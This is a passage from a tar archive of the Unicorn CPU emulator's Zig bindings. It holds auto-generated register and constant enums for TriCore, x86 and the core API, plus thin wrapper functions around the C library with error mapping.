86, SPARC_REG_XCC = 87, SPARC_REG_PC = 88, SPARC_REG_ENDING = 89, SPARC_REG_O6 = 84, SPARC_REG_I6 = 67, }; �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/tricore_const.zig������������������������������������������������0000664�0000000�0000000�00000005652�14675241067�0022647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const tricoreConst = enum(c_int) { // TRICORE CPU CPU_TRICORE_TC1796 = 0, CPU_TRICORE_TC1797 = 1, CPU_TRICORE_TC27X = 2, CPU_TRICORE_ENDING = 3, // TRICORE registers TRICORE_REG_INVALID = 0, TRICORE_REG_A0 = 1, TRICORE_REG_A1 = 2, TRICORE_REG_A2 = 3, TRICORE_REG_A3 = 4, TRICORE_REG_A4 = 5, TRICORE_REG_A5 = 6, TRICORE_REG_A6 = 7, TRICORE_REG_A7 = 8, TRICORE_REG_A8 = 9, TRICORE_REG_A9 = 10, TRICORE_REG_A10 = 11, TRICORE_REG_A11 = 12, TRICORE_REG_A12 = 13, TRICORE_REG_A13 = 14, TRICORE_REG_A14 = 15, TRICORE_REG_A15 = 16, TRICORE_REG_D0 = 17, TRICORE_REG_D1 = 18, TRICORE_REG_D2 = 19, TRICORE_REG_D3 = 20, TRICORE_REG_D4 = 21, TRICORE_REG_D5 = 22, TRICORE_REG_D6 = 23, TRICORE_REG_D7 = 24, TRICORE_REG_D8 = 25, TRICORE_REG_D9 = 26, TRICORE_REG_D10 = 27, TRICORE_REG_D11 = 28, TRICORE_REG_D12 = 29, TRICORE_REG_D13 = 30, TRICORE_REG_D14 = 31, TRICORE_REG_D15 = 32, TRICORE_REG_PCXI = 33, TRICORE_REG_PSW = 34, TRICORE_REG_PSW_USB_C = 35, TRICORE_REG_PSW_USB_V = 36, TRICORE_REG_PSW_USB_SV = 37, TRICORE_REG_PSW_USB_AV = 38, TRICORE_REG_PSW_USB_SAV = 39, TRICORE_REG_PC = 40, TRICORE_REG_SYSCON = 41, TRICORE_REG_CPU_ID = 42, TRICORE_REG_BIV = 43, TRICORE_REG_BTV = 44, TRICORE_REG_ISP = 45, TRICORE_REG_ICR = 46, TRICORE_REG_FCX = 47, TRICORE_REG_LCX = 48, TRICORE_REG_COMPAT = 49, TRICORE_REG_DPR0_U = 50, TRICORE_REG_DPR1_U = 51, TRICORE_REG_DPR2_U = 52, TRICORE_REG_DPR3_U = 53, TRICORE_REG_DPR0_L = 54, TRICORE_REG_DPR1_L = 55, TRICORE_REG_DPR2_L = 56, TRICORE_REG_DPR3_L = 57, TRICORE_REG_CPR0_U = 58, TRICORE_REG_CPR1_U = 59, TRICORE_REG_CPR2_U = 60, TRICORE_REG_CPR3_U = 61, TRICORE_REG_CPR0_L = 62, TRICORE_REG_CPR1_L = 63, TRICORE_REG_CPR2_L = 64, TRICORE_REG_CPR3_L = 65, TRICORE_REG_DPM0 = 66, TRICORE_REG_DPM1 = 67, TRICORE_REG_DPM2 = 68, TRICORE_REG_DPM3 = 69, TRICORE_REG_CPM0 = 70, TRICORE_REG_CPM1 = 71, TRICORE_REG_CPM2 = 72, TRICORE_REG_CPM3 = 73, TRICORE_REG_MMU_CON = 74, TRICORE_REG_MMU_ASI = 75, TRICORE_REG_MMU_TVA = 76, TRICORE_REG_MMU_TPA = 77, TRICORE_REG_MMU_TPX = 78, TRICORE_REG_MMU_TFA = 79, TRICORE_REG_BMACON = 80, TRICORE_REG_SMACON = 81, TRICORE_REG_DIEAR = 82, TRICORE_REG_DIETR = 83, TRICORE_REG_CCDIER = 84, TRICORE_REG_MIECON = 85, TRICORE_REG_PIEAR = 86, TRICORE_REG_PIETR = 87, TRICORE_REG_CCPIER = 88, TRICORE_REG_DBGSR = 89, TRICORE_REG_EXEVT = 90, TRICORE_REG_CREVT = 91, TRICORE_REG_SWEVT = 92, TRICORE_REG_TR0EVT = 93, TRICORE_REG_TR1EVT = 94, TRICORE_REG_DMS = 95, TRICORE_REG_DCX = 96, TRICORE_REG_DBGTCR = 97, TRICORE_REG_CCTRL = 98, TRICORE_REG_CCNT = 99, TRICORE_REG_ICNT = 100, TRICORE_REG_M1CNT = 101, TRICORE_REG_M2CNT = 102, TRICORE_REG_M3CNT = 103, TRICORE_REG_ENDING = 104, TRICORE_REG_GA0 = 1, TRICORE_REG_GA1 = 2, TRICORE_REG_GA8 = 9, TRICORE_REG_GA9 = 10, TRICORE_REG_SP = 11, TRICORE_REG_LR = 12, TRICORE_REG_IA = 16, TRICORE_REG_ID = 32, }; ��������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/unicorn.zig������������������������������������������������������0000664�0000000�0000000�00000021102�14675241067�0021433�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/// Public include's // Architectures pub const arm = @import("arm_const.zig"); pub const arm64 = @import("arm64_const.zig"); pub const m68k = @import("m68k_const.zig"); pub const mips = @import("mips_const.zig"); pub const ppc = @import("ppc_const.zig"); pub const riscv = @import("riscv_const.zig"); pub const tricore = @import("tricore_const.zig"); pub const sparc = @import("sparc_const.zig"); pub const s390x = @import("s390x_const.zig"); pub const x86 = @import("x86_const.zig"); // Unicorn consts pub usingnamespace @import("unicorn_const.zig"); // C include pub const c = @cImport(@cInclude("unicorn/unicorn.h")); pub fn uc_version(major: [*c]c_uint, minor: [*c]c_uint) c_uint { return c.uc_version(major, minor); } pub fn uc_arch_supported(arch: c.uc_arch) bool { return c.uc_arch_supported(arch); } pub fn uc_open(arch: c.uc_arch, mode: c.uc_mode, uc: [*c]?*c.uc_engine) !void { try getErrors(c.uc_open(arch, mode, uc)); } pub fn uc_close(uc: ?*c.uc_engine) !void { try getErrors(c.uc_close(uc)); } pub fn uc_query(uc: ?*c.uc_engine, @"type": c.uc_query_type, result: [*c]usize) !void { try getErrors(c.uc_query(uc, @"type", result)); } pub fn uc_ctl(uc: ?*c.uc_engine, control: c.uc_control_type) !void { try getErrors(c.uc_ctl(uc, control)); } pub fn uc_errno(uc: ?*c.uc_engine) !void { try getErrors(c.uc_errno(uc)); } pub fn uc_strerror(code: Error) [*:0]const u8 { return switch (code) { error.ucErrNoMemory => c.uc_strerror(c.UC_ERR_NOMEM), error.ucErrArch => c.uc_strerror(c.UC_ERR_ARCH), error.ucErrHandle => c.uc_strerror(c.UC_ERR_HANDLE), error.ucErrMode => c.uc_strerror(c.UC_ERR_MODE), error.ucErrVersion => c.uc_strerror(c.UC_ERR_VERSION), error.ucErrReadUnmapped => c.uc_strerror(c.UC_ERR_READ_UNMAPPED), error.ucErrWriteUnmapped => c.uc_strerror(c.UC_ERR_WRITE_UNMAPPED), error.ucErrFetchUnmapped => c.uc_strerror(c.UC_ERR_FETCH_UNMAPPED), error.ucErrHook => c.uc_strerror(c.UC_ERR_HOOK), error.ucErrInvalidInstruction => c.uc_strerror(c.UC_ERR_INSN_INVALID), error.ucErrMap => c.uc_strerror(c.UC_ERR_MAP), error.ucErrWriteProtected => c.uc_strerror(c.UC_ERR_WRITE_PROT), error.ucErrReadProtected => c.uc_strerror(c.UC_ERR_READ_PROT), error.ucErrFetchProtected => c.uc_strerror(c.UC_ERR_FETCH_PROT), error.ucErrInvalidArgument => c.uc_strerror(c.UC_ERR_ARG), error.ucErrReadUnaligned => c.uc_strerror(c.UC_ERR_READ_UNALIGNED), error.ucErrWriteUnaligned => c.uc_strerror(c.UC_ERR_WRITE_UNALIGNED), error.ucErrFetchUnaligned => c.uc_strerror(c.UC_ERR_FETCH_UNALIGNED), error.ucErrHookAlreadyExists => c.uc_strerror(c.UC_ERR_HOOK_EXIST), error.ucErrResource => c.uc_strerror(c.UC_ERR_RESOURCE), error.ucErrException => c.uc_strerror(c.UC_ERR_EXCEPTION), }; } pub fn uc_reg_write(uc: ?*c.uc_engine, regid: c_int, value: ?*const anyopaque) !void { try getErrors(c.uc_reg_write(uc, regid, value)); } pub fn uc_reg_read(uc: ?*c.uc_engine, regid: c_int, value: ?*anyopaque) !void { try getErrors(c.uc_reg_read(uc, regid, value)); } pub fn uc_reg_write_batch(uc: ?*c.uc_engine, regs: [*c]c_int, vals: [*c]const ?*anyopaque, count: c_int) !void { try getErrors(c.uc_reg_write_batch(uc, regs, vals, count)); } pub fn uc_reg_read_batch(uc: ?*c.uc_engine, regs: [*c]c_int, vals: [*c]?*anyopaque, count: c_int) !void { try getErrors(c.uc_reg_read_batch(uc, regs, vals, count)); } pub fn uc_mem_write(uc: ?*c.uc_engine, address: u64, bytes: ?*const anyopaque, size: usize) !void { try getErrors(c.uc_mem_write(uc, address, bytes, size)); } pub fn uc_mem_read(uc: ?*c.uc_engine, address: u64, bytes: ?*anyopaque, size: usize) !void { try getErrors(c.uc_mem_read(uc, address, bytes, size)); } pub fn uc_emu_start(uc: ?*c.uc_engine, begin: u64, until: u64, timeout: u64, count: usize) !void { try getErrors(c.uc_emu_start(uc, begin, until, timeout, count)); } pub fn uc_emu_stop(uc: ?*c.uc_engine) !void { try getErrors(c.uc_emu_stop(uc)); } pub fn uc_hook_add(uc: ?*c.uc_engine, hh: [*c]c.uc_hook, @"type": c_int, callback: ?*anyopaque, user_data: ?*anyopaque, begin: u64, end: u64) !void { try getErrors(c.uc_hook_add(uc, hh, @"type", callback, user_data, begin, end)); } pub fn uc_hook_del(uc: ?*c.uc_engine, hh: c.uc_hook) !void { try getErrors(c.uc_hook_del(uc, hh)); } pub fn uc_mem_map(uc: ?*c.uc_engine, address: u64, size: usize, perms: u32) !void { try getErrors(c.uc_mem_map(uc, address, size, perms)); } pub fn uc_mem_map_ptr(uc: ?*c.uc_engine, address: u64, size: usize, perms: u32, ptr: ?*anyopaque) !void { try getErrors(c.uc_mem_map_ptr(uc, address, size, perms, ptr)); } pub fn uc_mmio_map(uc: ?*c.uc_engine, address: u64, size: usize, read_cb: c.uc_cb_mmio_read_t, user_data_read: ?*anyopaque, write_cb: c.uc_cb_mmio_write_t, user_data_write: ?*anyopaque) !void { try getErrors(c.uc_mmio_map(uc, address, size, read_cb, user_data_read, write_cb, user_data_write)); } pub fn uc_mem_unmap(uc: ?*c.uc_engine, address: u64, size: usize) !void { try getErrors(c.uc_mem_unmap(uc, address, size)); } pub fn uc_mem_protect(uc: ?*c.uc_engine, address: u64, size: usize, perms: u32) !void { try getErrors(c.uc_mem_protect(uc, address, size, perms)); } pub fn uc_mem_regions(uc: ?*c.uc_engine, regions: [*c][*c]c.uc_mem_region, count: [*c]u32) !void { try getErrors(c.uc_mem_regions(uc, regions, count)); } pub fn uc_context_alloc(uc: ?*c.uc_engine, context: [*c]?*c.uc_context) !void { try getErrors(c.uc_context_alloc(uc, context)); } pub fn uc_free(mem: ?*anyopaque) !void { try getErrors(c.uc_free(mem)); } pub fn uc_context_save(uc: ?*c.uc_engine, context: ?*c.uc_context) !void { try getErrors(c.uc_context_save(uc, context)); } pub fn uc_context_reg_write(ctx: ?*c.uc_context, regid: c_int, value: ?*const anyopaque) !void { try getErrors(c.uc_context_reg_write(ctx, regid, value)); } pub fn uc_context_reg_read(ctx: ?*c.uc_context, regid: c_int, value: ?*anyopaque) !void { try getErrors(c.uc_context_reg_read(ctx, regid, value)); } pub fn uc_context_reg_write_batch(ctx: ?*c.uc_context, regs: [*c]c_int, vals: [*c]const ?*anyopaque, count: c_int) !void { try getErrors(c.uc_context_reg_write_batch(ctx, regs, vals, count)); } pub fn uc_context_reg_read_batch(ctx: ?*c.uc_context, regs: [*c]c_int, vals: [*c]?*anyopaque, count: c_int) !void { try getErrors(c.uc_context_reg_read_batch(ctx, regs, vals, count)); } pub fn uc_context_restore(uc: ?*c.uc_engine, context: ?*c.uc_context) !void { try getErrors(c.uc_context_restore(uc, context)); } pub fn uc_context_size(uc: ?*c.uc_engine) usize { try getErrors(c.uc_context_size(uc)); } pub fn uc_context_free(context: ?*c.uc_context) !void { try getErrors(c.uc_context_free(context)); } pub const Error = error{ ucErrNoMemory, ucErrArch, ucErrHandle, ucErrMode, ucErrVersion, ucErrReadUnmapped, ucErrWriteUnmapped, ucErrFetchUnmapped, ucErrHook, ucErrInvalidInstruction, ucErrMap, ucErrWriteProtected, ucErrReadProtected, ucErrFetchProtected, ucErrInvalidArgument, ucErrReadUnaligned, ucErrWriteUnaligned, ucErrFetchUnaligned, ucErrHookAlreadyExists, ucErrResource, ucErrException, }; pub fn errorsToZig(err: c.uc_err) Error!c_int { return switch (err) { //c.UC_ERR_OK - isn't error c.UC_ERR_NOMEM => error.ucErrNoMemory, c.UC_ERR_ARCH => error.ucErrArch, c.UC_ERR_HANDLE => error.ucErrHandle, c.UC_ERR_MODE => error.ucErrMode, c.UC_ERR_VERSION => error.ucErrVersion, c.UC_ERR_READ_UNMAPPED => error.ucErrReadUnmapped, c.UC_ERR_WRITE_UNMAPPED => error.ucErrWriteUnmapped, c.UC_ERR_FETCH_UNMAPPED => error.ucErrFetchUnmapped, c.UC_ERR_HOOK => error.ucErrHook, c.UC_ERR_INSN_INVALID => error.ucErrInvalidInstruction, c.UC_ERR_MAP => error.ucErrMap, c.UC_ERR_WRITE_PROT => error.ucErrWriteProtected, c.UC_ERR_READ_PROT => error.ucErrReadProtected, c.UC_ERR_FETCH_PROT => error.ucErrFetchProtected, c.UC_ERR_ARG => error.ucErrInvalidArgument, c.UC_ERR_READ_UNALIGNED => error.ucErrReadUnaligned, c.UC_ERR_WRITE_UNALIGNED => error.ucErrWriteUnaligned, c.UC_ERR_FETCH_UNALIGNED => error.ucErrFetchUnaligned, c.UC_ERR_HOOK_EXIST => error.ucErrHookAlreadyExists, c.UC_ERR_RESOURCE => error.ucErrResource, c.UC_ERR_EXCEPTION => error.ucErrException, else => -1, }; } fn getErrors(err: c.uc_err) !void { if (try errorsToZig(err) == c.UC_ERR_OK) return; } pub const log = @import("std").log.scoped(.unicorn); ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/unicorn_const.zig������������������������������������������������0000664�0000000�0000000�00000005665�14675241067�0022661�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const unicornConst = enum(c_int) { API_MAJOR = 2, API_MINOR = 1, API_PATCH = 0, API_EXTRA = 255, VERSION_MAJOR = 2, VERSION_MINOR = 1, VERSION_PATCH = 0, VERSION_EXTRA = 255, SECOND_SCALE = 1000000, MILISECOND_SCALE = 1000, ARCH_ARM = 1, ARCH_ARM64 = 2, ARCH_MIPS = 3, ARCH_X86 = 4, ARCH_PPC = 5, ARCH_SPARC = 6, ARCH_M68K = 7, ARCH_RISCV = 8, ARCH_S390X = 9, ARCH_TRICORE = 10, ARCH_MAX = 11, MODE_LITTLE_ENDIAN = 0, MODE_BIG_ENDIAN = 1073741824, MODE_ARM = 0, MODE_THUMB = 16, MODE_MCLASS = 32, MODE_V8 = 64, MODE_ARMBE8 = 1024, MODE_ARM926 = 128, MODE_ARM946 = 256, MODE_ARM1176 = 512, MODE_MICRO = 16, MODE_MIPS3 = 32, MODE_MIPS32R6 = 64, MODE_MIPS32 = 4, MODE_MIPS64 = 8, MODE_16 = 2, MODE_32 = 4, MODE_64 = 8, MODE_PPC32 = 4, MODE_PPC64 = 8, MODE_QPX = 16, MODE_SPARC32 = 4, MODE_SPARC64 = 8, MODE_V9 = 16, MODE_RISCV32 = 4, MODE_RISCV64 = 8, ERR_OK = 0, ERR_NOMEM = 1, ERR_ARCH = 2, ERR_HANDLE = 3, ERR_MODE = 4, ERR_VERSION = 5, ERR_READ_UNMAPPED = 6, ERR_WRITE_UNMAPPED = 7, ERR_FETCH_UNMAPPED = 8, ERR_HOOK = 9, ERR_INSN_INVALID = 10, ERR_MAP = 11, ERR_WRITE_PROT = 12, ERR_READ_PROT = 13, ERR_FETCH_PROT = 14, ERR_ARG = 15, ERR_READ_UNALIGNED = 16, ERR_WRITE_UNALIGNED = 17, ERR_FETCH_UNALIGNED = 18, ERR_HOOK_EXIST = 19, ERR_RESOURCE = 20, ERR_EXCEPTION = 21, ERR_OVERFLOW = 22, MEM_READ = 16, MEM_WRITE = 17, MEM_FETCH = 18, MEM_READ_UNMAPPED = 19, MEM_WRITE_UNMAPPED = 20, MEM_FETCH_UNMAPPED = 21, MEM_WRITE_PROT = 22, MEM_READ_PROT = 23, MEM_FETCH_PROT = 24, MEM_READ_AFTER = 25, TCG_OP_SUB = 0, TCG_OP_FLAG_CMP = 1, TCG_OP_FLAG_DIRECT = 2, HOOK_INTR = 1, HOOK_INSN = 2, HOOK_CODE = 4, HOOK_BLOCK = 8, HOOK_MEM_READ_UNMAPPED = 16, HOOK_MEM_WRITE_UNMAPPED = 32, HOOK_MEM_FETCH_UNMAPPED = 64, HOOK_MEM_READ_PROT = 128, HOOK_MEM_WRITE_PROT = 256, HOOK_MEM_FETCH_PROT = 512, HOOK_MEM_READ = 1024, HOOK_MEM_WRITE = 2048, HOOK_MEM_FETCH = 4096, HOOK_MEM_READ_AFTER = 8192, HOOK_INSN_INVALID = 16384, HOOK_EDGE_GENERATED = 32768, HOOK_TCG_OPCODE = 65536, HOOK_TLB_FILL = 131072, HOOK_MEM_UNMAPPED = 112, HOOK_MEM_PROT = 896, HOOK_MEM_READ_INVALID = 144, HOOK_MEM_WRITE_INVALID = 288, HOOK_MEM_FETCH_INVALID = 576, HOOK_MEM_INVALID = 1008, HOOK_MEM_VALID = 7168, QUERY_MODE = 1, QUERY_PAGE_SIZE = 2, QUERY_ARCH = 3, QUERY_TIMEOUT = 4, CTL_IO_NONE = 0, CTL_IO_WRITE = 1, CTL_IO_READ = 2, CTL_IO_READ_WRITE = 3, TLB_CPU = 0, TLB_VIRTUAL = 1, CTL_UC_MODE = 0, CTL_UC_PAGE_SIZE = 1, CTL_UC_ARCH = 2, CTL_UC_TIMEOUT = 3, CTL_UC_USE_EXITS = 4, CTL_UC_EXITS_CNT = 5, CTL_UC_EXITS = 6, CTL_CPU_MODEL = 7, CTL_TB_REQUEST_CACHE = 8, CTL_TB_REMOVE_CACHE = 9, CTL_TB_FLUSH = 10, CTL_TLB_FLUSH = 11, CTL_TLB_TYPE = 12, CTL_TCG_BUFFER_SIZE = 13, CTL_CONTEXT_MODE = 14, PROT_NONE = 0, PROT_READ = 1, PROT_WRITE = 2, PROT_EXEC = 4, PROT_ALL = 7, CTL_CONTEXT_CPU = 1, CTL_CONTEXT_MEMORY = 2, }; ���������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/x86_const.zig����������������������������������������������������0000664�0000000�0000000�00000112764�14675241067�0021630�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const x86Const = enum(c_int) { // X86 CPU CPU_X86_QEMU64 = 0, CPU_X86_PHENOM = 1, CPU_X86_CORE2DUO = 2, CPU_X86_KVM64 = 3, CPU_X86_QEMU32 = 4, CPU_X86_KVM32 = 5, CPU_X86_COREDUO = 6, CPU_X86_486 = 7, CPU_X86_PENTIUM = 8, CPU_X86_PENTIUM2 = 9, CPU_X86_PENTIUM3 = 10, CPU_X86_ATHLON = 11, CPU_X86_N270 = 12, CPU_X86_CONROE = 13, CPU_X86_PENRYN = 14, CPU_X86_NEHALEM = 15, CPU_X86_WESTMERE = 16, CPU_X86_SANDYBRIDGE = 17, CPU_X86_IVYBRIDGE = 18, CPU_X86_HASWELL = 19, CPU_X86_BROADWELL = 20, CPU_X86_SKYLAKE_CLIENT = 21, CPU_X86_SKYLAKE_SERVER = 22, CPU_X86_CASCADELAKE_SERVER = 23, CPU_X86_COOPERLAKE = 24, CPU_X86_ICELAKE_CLIENT = 25, CPU_X86_ICELAKE_SERVER = 26, CPU_X86_DENVERTON = 27, CPU_X86_SNOWRIDGE = 28, CPU_X86_KNIGHTSMILL = 29, CPU_X86_OPTERON_G1 = 30, CPU_X86_OPTERON_G2 = 31, CPU_X86_OPTERON_G3 = 32, CPU_X86_OPTERON_G4 = 33, CPU_X86_OPTERON_G5 = 34, CPU_X86_EPYC = 35, CPU_X86_DHYANA = 36, CPU_X86_EPYC_ROME = 37, CPU_X86_ENDING = 38, // X86 registers X86_REG_INVALID = 0, X86_REG_AH = 1, X86_REG_AL = 2, X86_REG_AX = 3, X86_REG_BH = 4, X86_REG_BL = 5, X86_REG_BP = 6, X86_REG_BPL = 7, X86_REG_BX = 8, X86_REG_CH = 9, X86_REG_CL = 10, X86_REG_CS = 11, X86_REG_CX = 12, X86_REG_DH = 13, X86_REG_DI = 14, X86_REG_DIL = 15, X86_REG_DL = 16, X86_REG_DS = 17, X86_REG_DX = 18, X86_REG_EAX = 19, X86_REG_EBP = 20, X86_REG_EBX = 21, X86_REG_ECX = 22, X86_REG_EDI = 23, X86_REG_EDX = 24, X86_REG_EFLAGS = 25, X86_REG_EIP = 26, X86_REG_ES = 28, X86_REG_ESI = 29, X86_REG_ESP = 30, X86_REG_FPSW = 31, X86_REG_FS = 32, X86_REG_GS = 33, X86_REG_IP = 34, X86_REG_RAX = 35, X86_REG_RBP = 36, X86_REG_RBX = 37, X86_REG_RCX = 38, X86_REG_RDI = 39, X86_REG_RDX = 40, X86_REG_RIP = 41, X86_REG_RSI = 43, X86_REG_RSP = 44, X86_REG_SI = 45, X86_REG_SIL = 46, X86_REG_SP = 47, X86_REG_SPL = 48, X86_REG_SS = 49, X86_REG_CR0 = 50, X86_REG_CR1 = 51, X86_REG_CR2 = 52, X86_REG_CR3 = 53, X86_REG_CR4 = 54, X86_REG_CR8 = 58, X86_REG_DR0 = 66, X86_REG_DR1 = 67, X86_REG_DR2 = 68, X86_REG_DR3 = 69, X86_REG_DR4 = 70, X86_REG_DR5 = 71, X86_REG_DR6 = 72, X86_REG_DR7 = 73, X86_REG_FP0 = 82, X86_REG_FP1 = 83, X86_REG_FP2 = 84, X86_REG_FP3 = 85, X86_REG_FP4 = 86, X86_REG_FP5 = 87, X86_REG_FP6 = 88, X86_REG_FP7 = 89, X86_REG_K0 = 90, X86_REG_K1 = 91, X86_REG_K2 = 92, X86_REG_K3 = 93, X86_REG_K4 = 94, X86_REG_K5 = 95, X86_REG_K6 = 96, X86_REG_K7 = 97, X86_REG_MM0 = 98, X86_REG_MM1 = 99, X86_REG_MM2 = 100, X86_REG_MM3 = 101, X86_REG_MM4 = 102, X86_REG_MM5 = 103, X86_REG_MM6 = 104, X86_REG_MM7 = 105, X86_REG_R8 = 106, X86_REG_R9 = 107, X86_REG_R10 = 108, X86_REG_R11 = 109, X86_REG_R12 = 110, X86_REG_R13 = 111, X86_REG_R14 = 112, X86_REG_R15 = 113, X86_REG_ST0 = 114, X86_REG_ST1 = 115, X86_REG_ST2 = 116, X86_REG_ST3 = 117, X86_REG_ST4 = 118, X86_REG_ST5 = 119, X86_REG_ST6 = 120, X86_REG_ST7 = 121, X86_REG_XMM0 = 122, X86_REG_XMM1 = 123, X86_REG_XMM2 = 124, X86_REG_XMM3 = 125, X86_REG_XMM4 = 126, X86_REG_XMM5 = 127, X86_REG_XMM6 = 128, X86_REG_XMM7 = 129, X86_REG_XMM8 = 130, X86_REG_XMM9 = 131, X86_REG_XMM10 = 132, X86_REG_XMM11 = 133, X86_REG_XMM12 = 134, X86_REG_XMM13 = 135, X86_REG_XMM14 = 136, X86_REG_XMM15 = 137, X86_REG_XMM16 = 138, X86_REG_XMM17 = 139, X86_REG_XMM18 = 140, X86_REG_XMM19 = 141, X86_REG_XMM20 = 142, X86_REG_XMM21 = 143, X86_REG_XMM22 = 144, X86_REG_XMM23 = 145, X86_REG_XMM24 = 146, X86_REG_XMM25 = 147, X86_REG_XMM26 = 148, X86_REG_XMM27 = 149, X86_REG_XMM28 = 150, X86_REG_XMM29 = 151, X86_REG_XMM30 = 152, X86_REG_XMM31 = 153, X86_REG_YMM0 = 154, X86_REG_YMM1 = 155, X86_REG_YMM2 = 156, X86_REG_YMM3 = 157, X86_REG_YMM4 = 158, X86_REG_YMM5 = 159, X86_REG_YMM6 = 160, X86_REG_YMM7 = 161, X86_REG_YMM8 = 162, X86_REG_YMM9 = 163, X86_REG_YMM10 = 164, X86_REG_YMM11 = 165, X86_REG_YMM12 = 166, X86_REG_YMM13 = 167, X86_REG_YMM14 = 168, X86_REG_YMM15 = 169, X86_REG_YMM16 = 170, X86_REG_YMM17 = 171, X86_REG_YMM18 = 172, X86_REG_YMM19 = 173, X86_REG_YMM20 = 174, X86_REG_YMM21 = 175, X86_REG_YMM22 = 176, X86_REG_YMM23 = 177, X86_REG_YMM24 = 178, X86_REG_YMM25 = 179, X86_REG_YMM26 = 180, X86_REG_YMM27 = 181, X86_REG_YMM28 = 182, X86_REG_YMM29 = 183, X86_REG_YMM30 = 184, X86_REG_YMM31 = 185, X86_REG_ZMM0 = 186, X86_REG_ZMM1 = 187, X86_REG_ZMM2 = 188, X86_REG_ZMM3 = 189, X86_REG_ZMM4 = 190, X86_REG_ZMM5 = 191, X86_REG_ZMM6 = 192, X86_REG_ZMM7 = 193, X86_REG_ZMM8 = 194, X86_REG_ZMM9 = 195, X86_REG_ZMM10 = 196, X86_REG_ZMM11 = 197, X86_REG_ZMM12 = 198, X86_REG_ZMM13 = 199, X86_REG_ZMM14 = 200, X86_REG_ZMM15 = 201, X86_REG_ZMM16 = 202, X86_REG_ZMM17 = 203, X86_REG_ZMM18 = 204, X86_REG_ZMM19 = 205, X86_REG_ZMM20 = 206, X86_REG_ZMM21 = 207, X86_REG_ZMM22 = 208, X86_REG_ZMM23 = 209, X86_REG_ZMM24 = 210, X86_REG_ZMM25 = 211, X86_REG_ZMM26 = 212, X86_REG_ZMM27 = 213, X86_REG_ZMM28 = 214, X86_REG_ZMM29 = 215, X86_REG_ZMM30 = 216, X86_REG_ZMM31 = 217, X86_REG_R8B = 218, X86_REG_R9B = 219, X86_REG_R10B = 220, X86_REG_R11B = 221, X86_REG_R12B = 222, X86_REG_R13B = 223, X86_REG_R14B = 224, X86_REG_R15B = 225, X86_REG_R8D = 226, X86_REG_R9D = 227, X86_REG_R10D = 228, X86_REG_R11D = 229, X86_REG_R12D = 230, X86_REG_R13D = 231, X86_REG_R14D = 232, X86_REG_R15D = 233, X86_REG_R8W = 234, X86_REG_R9W = 235, X86_REG_R10W = 236, X86_REG_R11W = 237, X86_REG_R12W = 238, X86_REG_R13W = 239, X86_REG_R14W = 240, X86_REG_R15W = 241, X86_REG_IDTR = 242, X86_REG_GDTR = 243, X86_REG_LDTR = 244, X86_REG_TR = 245, X86_REG_FPCW = 246, X86_REG_FPTAG = 247, X86_REG_MSR = 248, X86_REG_MXCSR = 249, X86_REG_FS_BASE = 250, X86_REG_GS_BASE = 251, X86_REG_FLAGS = 252, X86_REG_RFLAGS = 253, X86_REG_FIP = 254, X86_REG_FCS = 255, X86_REG_FDP = 256, X86_REG_FDS = 257, X86_REG_FOP = 258, X86_REG_ENDING = 259, // X86 instructions X86_INS_INVALID = 0, X86_INS_AAA = 1, X86_INS_AAD = 2, X86_INS_AAM = 3, X86_INS_AAS = 4, X86_INS_FABS = 5, X86_INS_ADC = 6, X86_INS_ADCX = 7, X86_INS_ADD = 8, X86_INS_ADDPD = 9, X86_INS_ADDPS = 10, X86_INS_ADDSD = 11, X86_INS_ADDSS = 12, X86_INS_ADDSUBPD = 13, X86_INS_ADDSUBPS = 14, X86_INS_FADD = 15, X86_INS_FIADD = 16, X86_INS_FADDP = 17, X86_INS_ADOX = 18, X86_INS_AESDECLAST = 19, X86_INS_AESDEC = 20, X86_INS_AESENCLAST = 21, X86_INS_AESENC = 22, X86_INS_AESIMC = 23, X86_INS_AESKEYGENASSIST = 24, X86_INS_AND = 25, X86_INS_ANDN = 26, X86_INS_ANDNPD = 27, X86_INS_ANDNPS = 28, X86_INS_ANDPD = 29, X86_INS_ANDPS = 30, X86_INS_ARPL = 31, X86_INS_BEXTR = 32, X86_INS_BLCFILL = 33, X86_INS_BLCI = 34, X86_INS_BLCIC = 35, X86_INS_BLCMSK = 36, X86_INS_BLCS = 37, X86_INS_BLENDPD = 38, X86_INS_BLENDPS = 39, X86_INS_BLENDVPD = 40, X86_INS_BLENDVPS = 41, X86_INS_BLSFILL = 42, X86_INS_BLSI = 43, X86_INS_BLSIC = 44, X86_INS_BLSMSK = 45, X86_INS_BLSR = 46, X86_INS_BOUND = 47, X86_INS_BSF = 48, X86_INS_BSR = 49, X86_INS_BSWAP = 50, X86_INS_BT = 51, X86_INS_BTC = 52, X86_INS_BTR = 53, X86_INS_BTS = 54, X86_INS_BZHI = 55, X86_INS_CALL = 56, X86_INS_CBW = 57, X86_INS_CDQ = 58, X86_INS_CDQE = 59, X86_INS_FCHS = 60, X86_INS_CLAC = 61, X86_INS_CLC = 62, X86_INS_CLD = 63, X86_INS_CLFLUSH = 64, X86_INS_CLFLUSHOPT = 65, X86_INS_CLGI = 66, X86_INS_CLI = 67, X86_INS_CLTS = 68, X86_INS_CLWB = 69, X86_INS_CMC = 70, X86_INS_CMOVA = 71, X86_INS_CMOVAE = 72, X86_INS_CMOVB = 73, X86_INS_CMOVBE = 74, X86_INS_FCMOVBE = 75, X86_INS_FCMOVB = 76, X86_INS_CMOVE = 77, X86_INS_FCMOVE = 78, 